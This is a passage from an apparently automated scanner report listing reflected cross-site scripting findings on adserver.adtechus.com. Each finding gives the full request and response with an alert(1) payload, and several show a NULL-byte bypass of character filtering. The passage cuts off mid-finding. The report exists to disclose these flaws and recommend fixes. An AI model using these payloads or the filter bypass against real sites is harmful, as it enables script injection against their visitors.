Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965578/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_1;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=346;misc=1290207916422;aduho=-360;rdclick=3672b"-alert(1)-"d43ce14780a HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2018

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
server.adtechus.com/adlink/5214/965578/0/5/AdId=861193;BnId=1;itime=210258001;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=3672b"-alert(1)-"d43ce14780ahttp://www.vecchiofrak.com\" target=\"_blank\">
...[SNIP]...

2.112. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965578/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f5b3b"-alert(1)-"528d178bff0 was submitted in the loc parameter. This input was echoed as f5b3b"-alert(1)-"528d178bff0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965578/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_1;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=576;misc=1290207898200;aduho=-360;rdclick=%00f5b3b"-alert(1)-"528d178bff0 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3064

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ver.adtechus.com/adlink/5214/965578/0/5/AdId=664088;BnId=1;itime=210259457;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(hoyt%20llc)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00f5b3b"-alert(1)-"528d178bff0http://www.toronto.com/restaurants/listing/000-213-013\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.113. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965578/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30c65"-alert(1)-"70b6690cc67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965578/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_1;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207886922;aduho=-360;rdclick=&30c65"-alert(1)-"70b6690cc67=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3039

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ttp://adserver.adtechus.com/adlink/5214/965578/0/5/AdId=932197;BnId=1;itime=210264342;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&30c65"-alert(1)-"70b6690cc67=1http://www.bonaviabakery.com\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.114. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965594/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 109bc"-alert(1)-"3bf1274285 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965594/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_160x600_1;size=160x600;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887381;aduho=-360;rdclick=109bc"-alert(1)-"3bf1274285 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 496

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=160x600&section=786976&pub_redirect_unencoded=1&pub_redirect=http://adserver.adtechus.com/adlink/5214/965594/0/154/AdId=607818;BnId=1;itime=210259934;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=109bc"-alert(1)-"3bf1274285\">
...[SNIP]...

2.115. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965594/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ca8c"-alert(1)-"a365a4bf0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965594/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_160x600_1;size=160x600;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=854;misc=1290207887381;aduho=-360;rdclick=&9ca8c"-alert(1)-"a365a4bf0ce=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=%27%27aee2d%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 500

document.write("\n");
document.write("<SCR"+"IPT TYPE=\"text/javascript\" SRC=\"http://ads.olivebrandresponse.com/st?ad_type=ad&ad_size=160x600&section=786976&pub_redirect_unencoded=1&pub_redirect=http://adserver.adtechus.com/adlink/5214/965594/0/154/AdId=607818;BnId=1;itime=210263701;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=&9ca8c"-alert(1)-"a365a4bf0ce=1\">
...[SNIP]...

2.116. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965607/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49258"-alert(1)-"1e48cde024f was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965607/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_728x90_1;size=728x90;key=;grp=353;misc=1290373578067;aduho=-360;rdclick=49258"-alert(1)-"1e48cde024f HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 2028

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965607/0/225/AdId=1115194;BnId=1;itime=384526888;nodecode=yes;link=49258"-alert(1)-"1e48cde024fhttp://www.seetorontonow.com/camp/couples/index.html?ucid=M2010-001706\" target=\"_blank\">
...[SNIP]...

2.117. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965607/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbfe"-alert(1)-"542e65d3e6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965607/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_728x90_1;size=728x90;key=;grp=353;misc=1290373578067;aduho=-360;rdclick=&9fbfe"-alert(1)-"542e65d3e6b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 2039

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
<a href=\"http://adserver.adtechus.com/adlink/5214/965607/0/225/AdId=1115194;BnId=2;itime=384529653;nodecode=yes;link=&9fbfe"-alert(1)-"542e65d3e6b=1http://www.seetorontonow.com/camp/girlfriends/index.html?ucid=M2010-001703\" target=\"_blank\">
...[SNIP]...

2.118. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28529"-alert(1)-"f738aaf4b11 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=28529"-alert(1)-"f738aaf4b11 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18989

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
LICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1178068;BnId=1;itime=384522683;nodecode=yes;link=28529"-alert(1)-"f738aaf4b11") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.119. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59289'-alert(1)-'e1de6942288 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=59289'-alert(1)-'e1de6942288 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18996

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
shClick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('965613'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1173398;BnId=4;itime=384526163;nodecode=yes;link=59289'-alert(1)-'e1de6942288')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE965613+"'))";
AT_TARGET965613="_self";
}
window.AT_ClickFn965613= function (click)
{    click=(isNaN(
...[SNIP]...

2.120. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0061d2c'-alert(1)-'92b4a6927d2 was submitted in the loc parameter. This input was echoed as 61d2c'-alert(1)-'92b4a6927d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=%0061d2c'-alert(1)-'92b4a6927d2 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19026

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
lick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('965613'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1173398;BnId=4;itime=388823999;nodecode=yes;link=%0061d2c'-alert(1)-'92b4a6927d2')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE965613+"'))";
AT_TARGET965613="_self";
}
window.AT_ClickFn965613= function (click)
{    click=(isNaN(
...[SNIP]...

2.121. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965613/0/-1/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc2ad"-alert(1)-"7a1ab3ca94e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5214.1/965613/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_homepage_237x90_1;size=237x90;key=;grp=353;misc=1290373577265;aduho=-360;rdclick=&cc2ad"-alert(1)-"7a1ab3ca94e=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19026

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5214/965613/0/2666/AdId=1173398;BnId=4;itime=384531287;nodecode=yes;link=&cc2ad"-alert(1)-"7a1ab3ca94e=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adl
...[SNIP]...

2.122. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00b6ee9"-alert(1)-"4092935581c was submitted in the loc parameter. This input was echoed as b6ee9"-alert(1)-"4092935581c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5214.1/965634/0/-1/ADTECH;loc=100;target=_blank;alias=toronto.com_searchresults_120x90_3;size=120x90;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;grp=440;misc=1290207938478;aduho=-360;rdclick=%00b6ee9"-alert(1)-"4092935581c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.toronto.com/searchResults?q=''aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 3025

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
p://adserver.adtechus.com/adlink/5214/965634/0/5/AdId=616420;BnId=1;itime=359139080;key=%27%27aee2d%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3EHoyt%20LLC%20PoC%20XSS%2011-19-2010;nodecode=yes;link=%00b6ee9"-alert(1)-"4092935581chttp://fune.sites.toronto.com/\" target=\"_blank\" style=\"font-family: Arial, Helvetica, sans-serif;font-size:12px;font-weight: bold; color: #000000\">
...[SNIP]...

2.123. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5214.1/965634/0/-1/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afa9"-alert(1)-"5e2918b53ea was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

